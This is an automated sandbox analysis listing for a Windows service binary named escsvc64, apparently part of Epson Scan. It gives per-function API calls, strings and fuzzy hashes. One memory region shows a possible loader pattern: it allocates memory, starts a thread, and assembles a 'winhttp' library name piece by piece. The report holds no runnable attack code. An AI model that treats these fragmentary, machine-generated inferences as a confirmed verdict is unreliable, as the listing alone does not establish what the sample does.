VirtualAlloc.KERNELBASE(000000014000645E,?,?,?,?,0000000140003447), ref: 000000014000764F
VirtualFree.KERNELBASE(?,?,?,?,0000000140003447), ref: 00000001400076E1

Strings

l, xrefs: 0000000140007609
ntdl, xrefs: 00000001400075FF

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: Virtual$AllocFree
String ID: l$ntdl
API String ID: 2087232378-924918826
Opcode ID: 0e4d7604a2b929d53cc1f1856375e7947663ec15530bb6538b89027d8cfb31b4
Instruction ID: 082983da74dfe290379792d1b3382f9732f054a55705ee5756d289afdac720fd
Opcode Fuzzy Hash: 0e4d7604a2b929d53cc1f1856375e7947663ec15530bb6538b89027d8cfb31b4
Instruction Fuzzy Hash: E94128A27106E48ADB15CF2BA840BDD2B55E75AFC0F449016FF4E1BB56CA3CC542C710

Function 0000000180001C10 Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StartServiceCtrlDispatcherW.ADVAPI32 ref: 0000000180001C51

Memory Dump Source

Source File: 00000000.00000002.1861692156.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd

Similarity

API ID: CtrlDispatcherServiceStart
String ID:
API String ID: 3789849863-0
Opcode ID: 43184d67f14c20715f7b26f6198189ae43bf3b66bb01ad773179d3671ebbb7a0
Instruction ID: b313e6faf4b91d82712c3ff4ec49ed76d19982d5675628aa87cac0bd1d38dc2e
Opcode Fuzzy Hash: 43184d67f14c20715f7b26f6198189ae43bf3b66bb01ad773179d3671ebbb7a0
Instruction Fuzzy Hash: DDF0DA31518E4C8FE781EF28C4997DA77E5F798311F818A2AF449C3250EF38D6848B42

Function 001F0570 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 326COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 001F08C2

Strings

6, xrefs: 001F0638
a, xrefs: 001F0600
, xrefs: 001F0630
l, xrefs: 001F05F8
G, xrefs: 001F06CB
i, xrefs: 001F0620
4, xrefs: 001F0640
(, xrefs: 001F0618
u, xrefs: 001F0628
5, xrefs: 001F0608
z, xrefs: 001F05F0
0, xrefs: 001F0610
M, xrefs: 001F05E8
T, xrefs: 001F06D3

Memory Dump Source

Source File: 00000000.00000003.1714556876.00000000001F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_1f0000_escsvc64.jbxd

Similarity

API ID: realloc
String ID: $($0$4$5$6$G$M$T$a$i$l$u$z
API String ID: 471065373-2079474088
Opcode ID: 7d012af2536f1f7d995bb6865e94ab2d39a3359b1312110b88a70488074df788
Instruction ID: 7ec3f774127c4727641ba4316498a8866575b2c65707d6e0a378af2f91f2380d
Opcode Fuzzy Hash: 7d012af2536f1f7d995bb6865e94ab2d39a3359b1312110b88a70488074df788
Instruction Fuzzy Hash: FBC1597061860C8FDF19DF64D8986EEBBE1FB98305F04412DE98ADB242DF70994ACB45

Function 001F01A0 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 253libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 001F0257

Strings

winh, xrefs: 001F01F2
msvcrt.dll, xrefs: 001F023C
dll, xrefs: 001F0200
ttp., xrefs: 001F01F9
user32.dll, xrefs: 001F022F
l)$~, xrefs: 001F04F9

Memory Dump Source

Source File: 00000000.00000003.1714556876.00000000001F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_1f0000_escsvc64.jbxd

Similarity

API ID: LibraryLoad
String ID: dll$l)$~$msvcrt.dll$ttp.$user32.dll$winh
API String ID: 1029625771-1052611218
Opcode ID: f96e166d31e0664f72b86a40ea9ed61905039d2648656030012699a26d18f6a5
Instruction ID: 2ac9a726799ac48c0a130d3513529ae525e5b576e82550c3c3b86dc13fe0d0db
Opcode Fuzzy Hash: f96e166d31e0664f72b86a40ea9ed61905039d2648656030012699a26d18f6a5
Instruction Fuzzy Hash: 3791BCB0910B4C8FC791EFB4845939BBAE1FF5C380F608A19A19DD7726DF3998418B85

Function 0000000140006450 Relevance: 10.6, APIs: 7, Instructions: 65
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140007170: _initp_misc_winsig.LIBCMT ref: 00000001400071A9
Part of subcall function 0000000140007170: KiUserExceptionDispatcher.NTDLL ref: 00000001400071B1

Part of subcall function 0000000140007610: VirtualAlloc.KERNELBASE(000000014000645E,?,?,?,?,0000000140003447), ref: 000000014000764F
Part of subcall function 0000000140007610: VirtualFree.KERNELBASE(?,?,?,?,0000000140003447), ref: 00000001400076E1

FlsFree.KERNEL32(?,?,?,?,0000000140003447), ref: 000000014000646D
TlsFree.KERNEL32(?,?,?,?,0000000140003447), ref: 0000000140006488
FlsAlloc.KERNEL32(?,?,?,?,0000000140003447), ref: 00000001400064AB
FlsSetValue.KERNEL32(?,?,?,?,0000000140003447), ref: 00000001400064ED
GetCurrentThreadId.KERNEL32 ref: 0000000140006501
FlsFree.KERNEL32(?,?,?,?,0000000140003447), ref: 000000014000652B
TlsFree.KERNEL32(?,?,?,?,0000000140003447), ref: 0000000140006546

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: Free$AllocVirtual$CurrentDispatcherExceptionThreadUserValue_initp_misc_winsig
String ID:
API String ID: 158422070-0
Opcode ID: 9195a0cd0be8c3569a83707636c05d213fc4554a45bd247ded46233fca8e8480
Instruction ID: cce0763aefef4587a24946a9f4ca3712f20a1716bcb15b54cc0025836c1ee2c2
Opcode Fuzzy Hash: 9195a0cd0be8c3569a83707636c05d213fc4554a45bd247ded46233fca8e8480
Instruction Fuzzy Hash: C431ECB0600A018AE65AEB7BB8583D93292AB4D7F5F980318F7765F2F1DF7D84468610

Function 001F0960 Relevance: 3.1, APIs: 2, Instructions: 117memorythreadCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 001F0A70
CreateThread.KERNELBASE ref: 001F0AA4

Memory Dump Source

Source File: 00000000.00000003.1714556876.00000000001F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_1f0000_escsvc64.jbxd

Similarity

API ID: AllocCreateThreadVirtual
String ID:
API String ID: 3065189322-0
Opcode ID: 37883c71a4e1d3b3c6981b9ed2e9e665bf046d071fdbf6d9a47d73c2f0244c8d
Instruction ID: 13a11b2a975c384cb44c94f81c102f8a731fe8fbc20b8a548073b4f0e84c3545
Opcode Fuzzy Hash: 37883c71a4e1d3b3c6981b9ed2e9e665bf046d071fdbf6d9a47d73c2f0244c8d
Instruction Fuzzy Hash: 94414570608608CFCF58EF18C4887AD7BE2FB48758F00412DAD0EEB256DBB58958CB84

Function 0000000140007170 Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140005E60: FlsGetValue.KERNEL32(?,?,?,000000014000717B,?,?,00000000,0000000140006459,?,?,?,?,0000000140003447), ref: 0000000140005E7A

_initp_misc_winsig.LIBCMT ref: 00000001400071A9
KiUserExceptionDispatcher.NTDLL ref: 00000001400071B1

Part of subcall function 0000000140005D90: FlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000D595,?,?,?,000000014000970C), ref: 0000000140005DB0

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: Value$DispatcherExceptionUser_initp_misc_winsig
String ID:
API String ID: 3398106669-0
Opcode ID: 2579abccdfdfa1ca2409a143a2b4d5cf1ae2fe72868da0f7081bba654f418bec
Instruction ID: e400128bdf60cb768f5461161da783887e2f7fea914d3257c31e6f2653dd6cfd
Opcode Fuzzy Hash: 2579abccdfdfa1ca2409a143a2b4d5cf1ae2fe72868da0f7081bba654f418bec
Instruction Fuzzy Hash: 2BF0AEF06A620640E90AFB637826BEA03808B8FBC1F4820317B0B0B2B39D3880404380

Function 0000000140008800 Relevance: 3.0, APIs: 2, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(?,?,?,?,000000014000341C), ref: 0000000140008812
HeapSetInformation.KERNEL32 ref: 0000000140008841

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: Heap$CreateInformation
String ID:
API String ID: 1774340351-0
Opcode ID: 2f3b07a5057123e73a3f5e291b1c4a5b22797b276520671a3e4f3cb1187edd10
Instruction ID: ce64bbf01f416f0299a489085bfe71602f84ad1ff6a2fcf5659d02faa047aa91
Opcode Fuzzy Hash: 2f3b07a5057123e73a3f5e291b1c4a5b22797b276520671a3e4f3cb1187edd10
Instruction Fuzzy Hash: 9CE048B5B1265082F7995B12AC49B9D6660F79C780F809019FB4D43764DF7DC1454B00

Function 0000000140007610 Relevance: 2.6, APIs: 2, Instructions: 69
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(000000014000645E,?,?,?,?,0000000140003447), ref: 000000014000764F
VirtualFree.KERNELBASE(?,?,?,?,0000000140003447), ref: 00000001400076E1

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 89dea25f0bcc4f905972bf8608fe8dcd6de5403fdbd72f1580a36dc66a60dc05
Instruction ID: f65805860dc40e2b983aaf0f666c5c3de04cc8ec45c5f093d04358e3227d39e4
Opcode Fuzzy Hash: 89dea25f0bcc4f905972bf8608fe8dcd6de5403fdbd72f1580a36dc66a60dc05
Instruction Fuzzy Hash: A121F3637156E88BCF46CF2BA88469E2F15D75ABC4B04906AEE4E17B1AC938D186C710

Function 000000018000BBC0 Relevance: 1.5, APIs: 1, Instructions: 16
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 000000018000BBE0

Memory Dump Source

Source File: 00000000.00000002.1861692156.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: a1bfea3291010e4e8c9c942faa318457b8d813102347f83538f3b7a194bc6733
Instruction ID: 2f1e772e7f36b6363628d8cc3ae21d80d83d642b4dc8e669f90c229daf89f17f
Opcode Fuzzy Hash: a1bfea3291010e4e8c9c942faa318457b8d813102347f83538f3b7a194bc6733
Instruction Fuzzy Hash: 9BD0A73012160087E3089720EC857D6B294F788305F80011CF846C1180DB2C86D4C642

Function 00000001400076B0 Relevance: 1.3, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNELBASE(?,?,?,?,0000000140003447), ref: 00000001400076E1

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 645e027d282d799c43ef8747a086244cde8df3e933449bd1787ac8c2826f5191
Instruction ID: 79d5dedfb32e33f50797cdffc4c50002341004bd1cd21fd5edceff188308d5b8
Opcode Fuzzy Hash: 645e027d282d799c43ef8747a086244cde8df3e933449bd1787ac8c2826f5191
Instruction Fuzzy Hash: 0AE0D8B3F145A801EB03CB2BE80076A1B40D389BE4F044012CE5A07B55C93DD8C3C724

Non-executed Functions

Function 0000000140001C90 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 233
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.ADVAPI32 ref: 0000000140001D1D
RegQueryValueExW.ADVAPI32 ref: 0000000140001D59
RegCloseKey.ADVAPI32 ref: 0000000140001D6B
lstrlenW.KERNEL32 ref: 0000000140001DA0
RegOpenKeyExW.ADVAPI32 ref: 0000000140001E23
RegQueryValueExW.ADVAPI32 ref: 0000000140001E62
lstrlenW.KERNEL32 ref: 0000000140001EB4
RegCloseKey.ADVAPI32 ref: 0000000140001EC1
lstrlenW.KERNEL32 ref: 0000000140001ED7
RegOpenKeyExW.ADVAPI32 ref: 0000000140001F62
RegQueryValueExW.ADVAPI32 ref: 0000000140001FA1
lstrlenW.KERNEL32 ref: 0000000140001FF5
RegCloseKey.ADVAPI32 ref: 0000000140002002

Strings

EventNum, xrefs: 0000000140001D31
EventAppPath, xrefs: 0000000140001F7A
%s,%d, xrefs: 0000000140002038
EventAppName, xrefs: 0000000140001E3B
SOFTWARE\WOW6432Node\EPSON\EPSON Scan\%s, xrefs: 0000000140001CD2

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: lstrlen$CloseOpenQueryValue
String ID: %s,%d$EventAppName$EventAppPath$EventNum$SOFTWARE\WOW6432Node\EPSON\EPSON Scan\%s
API String ID: 2304643261-626936756
Opcode ID: 62891b438a3453a252617a46415941b0fbaf98d22866081e69189f8907fac70b
Instruction ID: 851eba2c86d670d338626dfcb874a6128995a4a42896a861548f75aefceaae5c
Opcode Fuzzy Hash: 62891b438a3453a252617a46415941b0fbaf98d22866081e69189f8907fac70b
Instruction Fuzzy Hash: 61A14DB2214B9191EB62CF26F4447EA73A4FBD8BC4F505125FB8947AA8EF79C109C700

Function 0000000140008E50 Relevance: 29.0, APIs: 19, Instructions: 515
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4da54c64fb83bcbb0ce7322d2336a31bfe2eeecc11d53a15874d237ff8e356b4
Instruction ID: 616335567b3cd955fe8f98c99b09db664dae43f906a390fd336d3b9533428147
Opcode Fuzzy Hash: 4da54c64fb83bcbb0ce7322d2336a31bfe2eeecc11d53a15874d237ff8e356b4
Instruction Fuzzy Hash: 4922BFB2214A4186EB62CF27F8443EA77A1F789BC4F540116FB8A477B5EB7AC545CB00

Function 0000000140002090 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 144
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32 ref: 0000000140002112
lstrcpynW.KERNEL32 ref: 0000000140002154
lstrcmpiW.KERNEL32 ref: 00000001400021BF
lstrcmpiW.KERNEL32 ref: 00000001400021D9
lstrcmpiW.KERNEL32 ref: 00000001400021F3
lstrcmpiW.KERNEL32 ref: 0000000140002209
lstrcmpiW.KERNEL32 ref: 000000014000221F
SHGetFolderPathW.SHELL32 ref: 0000000140002243
SHGetFolderPathW.SHELL32 ref: 00000001400022B0
lstrlenW.KERNEL32 ref: 00000001400022E3

Strings

PROG_DIR, xrefs: 0000000140002213
WIN_DIR, xrefs: 00000001400021B3
ProgramFiles(x86), xrefs: 0000000140002274
PROGx86_DIR, xrefs: 00000001400021E7
%s\%s, xrefs: 00000001400022C7

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: lstrcmpi$FolderPathlstrlen$lstrcpyn
String ID: %s\%s$PROG_DIR$PROGx86_DIR$ProgramFiles(x86)$WIN_DIR
API String ID: 2656894383-2711514926
Opcode ID: 40ba0e74f043a88d633bd0d537ed384bec8f8e2864fd312c8e0aa503a1054268
Instruction ID: 7752ae9e4689017d9ad54f8639a9706760fd27286e3c0e01a1f653311e9c638a
Opcode Fuzzy Hash: 40ba0e74f043a88d633bd0d537ed384bec8f8e2864fd312c8e0aa503a1054268
Instruction Fuzzy Hash: 9C514E72218B81A1EB62DF62F4447DA63A5FB9C7C4F805025FB8947AB4EF79C549C700

Function 000000014000CF60 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 152
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140005E60: FlsGetValue.KERNEL32(?,?,?,000000014000717B,?,?,00000000,0000000140006459,?,?,?,?,0000000140003447), ref: 0000000140005E7A

LoadLibraryA.KERNEL32 ref: 000000014000CFA2
GetProcAddress.KERNEL32 ref: 000000014000CFBE

Part of subcall function 0000000140005D90: FlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000D595,?,?,?,000000014000970C), ref: 0000000140005DB0

GetProcAddress.KERNEL32 ref: 000000014000CFE6

Part of subcall function 0000000140005D90: GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000D595,?,?,?,000000014000970C), ref: 0000000140005DCB
Part of subcall function 0000000140005D90: GetModuleHandleA.KERNEL32 ref: 0000000140005DF2
Part of subcall function 0000000140005D90: GetProcAddress.KERNEL32 ref: 0000000140005E38

GetProcAddress.KERNEL32 ref: 000000014000D005
GetProcAddress.KERNEL32 ref: 000000014000D053
GetProcAddress.KERNEL32 ref: 000000014000D077

Part of subcall function 0000000140004A40: RtlCaptureContext.KERNEL32 ref: 0000000140004A51
Part of subcall function 0000000140004A40: IsDebuggerPresent.KERNEL32 ref: 0000000140004A95
Part of subcall function 0000000140004A40: SetUnhandledExceptionFilter.KERNEL32 ref: 0000000140004A9F
Part of subcall function 0000000140004A40: UnhandledExceptionFilter.KERNEL32 ref: 0000000140004AAA
Part of subcall function 0000000140004A40: GetCurrentProcess.KERNEL32 ref: 0000000140004AC0
Part of subcall function 0000000140004A40: TerminateProcess.KERNEL32 ref: 0000000140004ACE

Part of subcall function 0000000140005F50: FlsGetValue.KERNEL32(?,00000000,000002D8,0000000140003765,?,?,000002D8,0000000140007327,?,?,?,?,00000000,0000000140008A7E), ref: 0000000140005F70

Part of subcall function 0000000140005F50: GetModuleHandleA.KERNEL32(?,00000000,000002D8,0000000140003765,?,?,000002D8,0000000140007327,?,?,?,?,00000000,0000000140008A7E), ref: 0000000140005F8B
Part of subcall function 0000000140005F50: GetModuleHandleA.KERNEL32 ref: 0000000140005FB2
Part of subcall function 0000000140005F50: GetProcAddress.KERNEL32 ref: 0000000140005FF8

Strings

GetUserObjectInformationA, xrefs: 000000014000D049
MessageBoxA, xrefs: 000000014000CFB4
USER32.DLL, xrefs: 000000014000CF9B
GetProcessWindowStation, xrefs: 000000014000D06D
GetLastActivePopup, xrefs: 000000014000CFF4
GetActiveWindow, xrefs: 000000014000CFD5

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: AddressProc$HandleModule$Value$ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerLibraryLoadPresentTerminate
String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
API String ID: 3160505718-232180764
Opcode ID: fadb4bf039c24c9ffc6cabc9b48688cb4110fbf93598bb5f256590db30fcdbee
Instruction ID: 055fb55905cb7df163c1d96a02b24be9108de682761868c3bff01f0b1f6f2f83
Opcode Fuzzy Hash: fadb4bf039c24c9ffc6cabc9b48688cb4110fbf93598bb5f256590db30fcdbee
Instruction Fuzzy Hash: CC5150B1205B5190FEA6EB23B8547E633A5AB8DBC0F484026BF5D477B5EF39C5458320

Function 0000000140001890 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 50servicesleepCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32 ref: 00000001400018A0
OpenServiceW.ADVAPI32 ref: 00000001400018C7
ControlService.ADVAPI32 ref: 00000001400018E4
Sleep.KERNEL32 ref: 00000001400018F3
QueryServiceStatus.ADVAPI32 ref: 0000000140001903
Sleep.KERNEL32 ref: 000000014000191E
QueryServiceStatus.ADVAPI32 ref: 000000014000192E
DeleteService.ADVAPI32 ref: 000000014000193B
CloseServiceHandle.ADVAPI32 ref: 0000000140001944
CloseServiceHandle.ADVAPI32 ref: 000000014000194D

Strings

EpsonScanSvc, xrefs: 00000001400018B2

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: Service$CloseHandleOpenQuerySleepStatus$ControlDeleteManager
String ID: EpsonScanSvc
API String ID: 2902594379-1444984947
Opcode ID: 44616b00be484275717ae0b3628ae0871233172b93312570258cad8b29c10706
Instruction ID: 159409440c7146a6a51766acc4e85108adb0bebee236ff060b2e696b6dd3abf8
Opcode Fuzzy Hash: 44616b00be484275717ae0b3628ae0871233172b93312570258cad8b29c10706
Instruction Fuzzy Hash: 4E11F87434175182FB979F23BC547E823A1AB8DBD1F485028BA4E4B3B4DE7AC289C710

Function 0000000140001460 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 99registryCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001400012A0), ref: 0000000140001481
CreateEventW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001400012A0), ref: 00000001400014A3
RegisterDeviceNotificationW.USER32 ref: 0000000140001528
SetServiceStatus.ADVAPI32 ref: 000000014000156E
WaitForMultipleObjects.KERNEL32 ref: 00000001400015A8
UnregisterDeviceNotification.USER32 ref: 00000001400015C9
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001400012A0), ref: 00000001400015E0
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001400012A0), ref: 00000001400015FC

Strings

, xrefs: 00000001400014EA
+/bad allocation, xrefs: 0000000140001518

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: CloseCreateDeviceEventHandleNotification$MultipleObjectsRegisterServiceStatusUnregisterWait
String ID: $+/bad allocation
API String ID: 297913478-685527123
Opcode ID: c6c6b533b63b5dd4e8371b5c67f0a56d84ec37e9fa0e94d4644b6e4d1ac1c462
Instruction ID: 7b25ca7211ab2d744b303caa1e776991c17dcff937dd20356167c5d69d76a0e3
Opcode Fuzzy Hash: c6c6b533b63b5dd4e8371b5c67f0a56d84ec37e9fa0e94d4644b6e4d1ac1c462
Instruction Fuzzy Hash: 8E41C4B1615A518BEB52CF6AF840B9A7BF4F78C784F145119FB9E8B674DB7AC0048B00

Function 0000000140001080 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 96COMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32 ref: 00000001400010BA
CommandLineToArgvW.SHELL32 ref: 00000001400010C8
LocalFree.KERNEL32 ref: 0000000140001184
StartServiceCtrlDispatcherW.ADVAPI32 ref: 00000001400011D9
GetLastError.KERNEL32 ref: 00000001400011E3

Strings

/INSTALL, xrefs: 0000000140001103
/START, xrefs: 000000014000111C
/REMOVE, xrefs: 0000000140001135
EpsonScanSvc, xrefs: 0000000140001086
